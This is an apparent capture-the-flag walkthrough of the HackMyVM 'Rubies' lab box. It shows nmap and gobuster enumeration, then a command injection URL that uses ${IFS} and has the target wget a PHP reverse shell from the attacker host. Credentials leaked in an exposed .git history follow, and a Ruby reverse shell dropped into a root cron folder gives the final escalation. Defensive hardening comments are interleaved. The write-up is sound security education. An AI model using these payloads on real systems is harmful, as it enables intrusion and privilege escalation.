HackMyVM - Rubies


 

Rubies is a Medium difficulty machine with some really useful techniques to understand.
As always, there are different methods to achieve the same outcome; this is just the way I did it.

Find it

└─$ sudo netdiscover -r 10.0.0.0/24 -P|tee findit

[sudo] password for kali: 

 _____________________________________________________________________________

   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      

 -----------------------------------------------------------------------------

 10.0.0.1        08:00:27:95:67:5b      1      60  PCS Systemtechnik GmbH

 10.0.0.113      08:00:27:95:1d:09      1      60  PCS Systemtechnik GmbH


-- Active scan completed, 2 Hosts found.

 


Scan it

└─$ nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.113

# Nmap 7.91 scan initiated Thu Dec 30 09:38:13 2021 as: nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.113

Nmap scan report for 10.0.0.113

Host is up (0.00069s latency).

Not shown: 65533 closed ports

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey: 

|   2048 54:65:0b:7a:f3:5c:2f:1f:14:9e:bb:0e:44:0c:af:29 (RSA)

|   256 1f:5d:63:05:65:f7:cf:70:e4:0d:0a:45:80:77:50:2c (ECDSA)

|_  256 69:a2:0f:83:dc:19:f2:c1:72:9c:a3:f8:09:44:3e:36 (ED25519)

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

| http-git: 

|   10.0.0.113:80/.git/

|     Git repository found!

|     Repository description: Unnamed repository; edit this file 'description' to name the...

|_    Last commit message: Why minnie? 

|_http-server-header: Apache/2.4.18 (Ubuntu)

|_http-title: Cute Cat Only

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Thu Dec 30 09:38:28 2021 -- 1 IP address (1 host up) scanned in 15.13 seconds



So SSH, and a web server that exposes a git repository. Still worth a quick gobuster scan to see if there is anything else.

└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://10.0.0.113 -x html,php,txt -t 150


===============================================================

Gobuster v3.1.0

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:                     http://10.0.0.113

[+] Method:                  GET

[+] Threads:                 150

[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

[+] Negative Status codes:   404

[+] User Agent:              gobuster/3.1.0

[+] Extensions:              html,php,txt

[+] Follow Redirect:         true

[+] Timeout:                 10s

===============================================================

2022/01/15 05:15:02 Starting gobuster in directory enumeration mode

===============================================================

/bg                   (Status: 200) [Size: 923]

/index.php            (Status: 200) [Size: 742]

/uploads              (Status: 200) [Size: 1133]

/javascript           (Status: 403) [Size: 275] 

/poems                (Status: 200) [Size: 1692]

/server-status        (Status: 403) [Size: 275] 

 


Looking at the web page and putting what has been discovered together: the page has a 'Next' button that displays a random poem, and the poems directory contains files that match those poems, so the page is probably reading a file named by a parameter, which we may be able to exploit.
Playing around with different URLs shows we can read files OK.


Adding ;id to the path shows the id of www-data, so we can execute commands too...
However, the code seems to detect command injection if there is a space in the URL, so we just need to replace each space with $IFS or ${IFS} to bypass this.
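As an added illustration (not the box's code), here is the poem-parameter check in Python: the space-only blocklist the page describes beside an allow-list check that resolves the file directly instead of going through a shell. The poems directory path and the poem names are assumptions.

```python
import os
import re

# Assumed: the app reads poems/<name> under the web root (from the page's
# shell_exec("cat poems/".$input)); the real poem file names are not on the
# page, so this set is constructed for the example.
POEM_DIR = "/var/www/html/poems"
KNOWN_POEMS = {"poem1", "poem2", "poem3"}

def space_blocklist_accepts(value: str) -> bool:
    """The check the page describes: reject only a literal space.
    ';' still separates commands and ${IFS} expands to whitespace,
    so the filter is bypassed without any space in the URL."""
    return " " not in value

def allowlist_accepts(value: str, allowed=KNOWN_POEMS) -> bool:
    """Hardened check: a short token of safe characters that names a
    poem which actually exists. No shell metacharacter can get through."""
    return bool(re.fullmatch(r"[A-Za-z0-9_-]{1,32}", value)) and value in allowed

def safe_poem_path(value: str, base=POEM_DIR, allowed=KNOWN_POEMS):
    """Resolve the file to open directly (no shell), or None if rejected.
    The realpath check is defence in depth against traversal or symlinks."""
    if not allowlist_accepts(value, allowed):
        return None
    root = os.path.realpath(base)
    path = os.path.realpath(os.path.join(root, value))
    if os.path.commonpath([root, path]) != root:
        return None
    return path
```

The same idea carries over to the PHP side: compare $_GET['poem'] against the entries returned by scandir('poems') and read the file with file_get_contents rather than shell_exec.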

Armed with this, I use a PHP reverse shell file from:
Edit it with my IP and port number.
Start a simple Python web server so the target can download it, then execute it:

http://10.0.0.113/index.php?poem=poem1;wget${IFS}-O${IFS}/tmp/rs.php${IFS}http://10.0.0.10:8000/rs.php

┌──(kali㉿kali)-[~/rubies]

└─$ nc -nvlp 4444 


connect to [10.0.0.10] from (UNKNOWN) [10.0.0.113] 54728

Linux rubies 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

 19:07:56 up 57 min,  1 user,  load average: 0.00, 0.00, 0.95

USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

minnie   pts/0    10.0.0.10        18:56    2:27   0.28s  0.28s /bin/bash

uid=33(www-data) gid=33(www-data) groups=33(www-data)

bash: cannot set terminal process group (2190): Inappropriate ioctl for device

bash: no job control in this shell

www-data@rubies:/$ 


So I have a shell but no credentials yet... but is there anything in the git repo?

https://github.com/internetwache/GitTools has some handy tools to clone a git repo from a web server.
(Big thanks to 4treetwo / nine for the hint and pointing me to this tool!)

./GitTools/Dumper/gitdumper.sh http://10.0.0.113/.git/ git

Changing into the git directory and running:

└─$ git show HEAD  

shows the history, which includes some credentials...

diff --git a/index.php b/index.php

index 41f0f2f..d33ca0d 100644

--- a/index.php

+++ b/index.php

@@ -8,33 +8,6 @@ if(isset($_GET['poem'])){

                $output = shell_exec("cat poems/".$input);

        }

 }

-

-

-// we dont need a login page dangit minnie! follow my orders pls

-$servername = "localhost";

-$username = "root";

-$password = "jd92    ";
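Review bot: deleting the hard-coded `$servername`/`$username`/`$password` block from index.php does not revoke the credential; the commit remains in history and, as the nmap http-git result shows, the .git directory is served by the web server, so anyone can recover it with `git show HEAD`. Rotate the password and stop serving .git. The unchanged context line `$output = shell_exec("cat poems/".$input);` also still concatenates the request parameter into a shell command; validate `$input` against an allow-list of poem names, or read the file directly with file_get_contents on a path confined to the poems directory, rather than filtering characters.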


So 'minnie' used the same password as the user account.
I just need to stabilise the session to allow su to work:
python3 -c 'import pty; pty.spawn("/bin/sh")'
and then su to minnie with the found password.

minnie's shell is a Ruby interactive shell (irb), so just spawn a bash shell with the command:
exec("/bin/bash")

Escalate to root.

pspy64 shows root executing a task every minute... but it didn't tell me exactly what.

minnie@rubies:/tmp$ ./pspy64 

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855





Using linpeas.sh and looking at files owned by minnie or writable by minnie's group identifies /opt/cleaning as an interesting folder: minnie has rights to create files inside it.

minnie@rubies:/opt/cleaning$ ls -al

total 12

drwxrwxr-x 2 root minnie 4096 Jan 15 20:03 .

drwxr-xr-x 3 root root   4096 Nov  2  2020 ..

-rw-r--r-- 1 root root    108 Nov  2  2020 webserver_upload.rb

minnie@rubies:/opt/cleaning$ cat webserver_upload.rb 

require "find"


Find.find("/var/www/html/uploads/") do |file|

  File.delete("#{file}") if file=~/\.php/

end

minnie@rubies:/opt/cleaning$ 


As we don't see this code specifically executed by pspy, it could be called from another script, and since people tend to reuse code it may just execute any .rb file in the folder.

After testing this by getting it to create a file in /tmp, I just downloaded and edited:

Set up another reverse listener first, then put the revshell.rb file inside /opt/cleaning/ and got a root shell within a minute.

└─$ nc -nvlp 5555

listening on [any] 5555 ...

connect to [10.0.0.10] from (UNKNOWN) [10.0.0.113] 41382

We are connected!

id

uid=0(root) gid=0(root) groups=0(root)

hostname

rubies




Overall this was a really nice box to play with.
